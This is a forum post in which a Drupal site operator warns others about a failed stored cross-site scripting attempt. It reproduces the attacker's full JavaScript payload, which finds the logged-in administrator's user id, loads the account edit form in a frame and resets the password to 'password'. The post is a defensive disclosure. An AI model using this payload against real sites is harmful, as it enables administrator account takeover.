Site under attack

Someone has just tried a nasty little attack on our Drupal-based site, www.bachtrack.com. The attack failed, but I thought it was worth posting a warning to others. If there's a better place to post this (a security forum somewhere else?) someone please let me know.

The attacker registered as a user, and posted a piece of Javascript into as many places as he could find to add content to the site - including his signature and a couple of custom forms. The intention of the script was to set the passwords of all users to "password" (I've shown the script in full below).

The script didn't get executed - indicating that our site code was successful in stripping tags or converting '<' to '<' in all the places it should have done. But for any novice module writers, it's a real reminder that there are people out there who will try this stuff. Quite why they would want to take control of a classical music listings site is not as clear.

Here's what they tried to run:

function alterUser() {
  var text = document.documentElement.innerHTML;
  var myAccountText = text.indexOf('My account');
  var i = myAccountText-2;
  while (! text.charAt(i).match(/[0-9]/g)) {
    i--;
  }
  myAccountNumber = text.substring(i, myAccountText-2);
  if (myAccountNumber == 1) {
    /*alert(myAccountNumber );*/
    var url = "http://192.168.0.2/?q=user/"; + myAccountNumber + "/edit";
    document.write('');
    document.write('');
    window.frames['foo'].location = url;
    /* Slow it down, let the load happen */
    setTimeout('doNext()', 4000);
   }
}
function doNext() {
    var theDoc = document.getElementById('foo');
    foo.document.getElementById('edit-pass-pass1').value = 'password';
    foo.document.getElementById('edit-pass-pass2').value = 'password';
    foo.document.getElementById('user-edit').submit();
    /* Admin pass changed - TODO: alert evil overlords */
}
alterUser();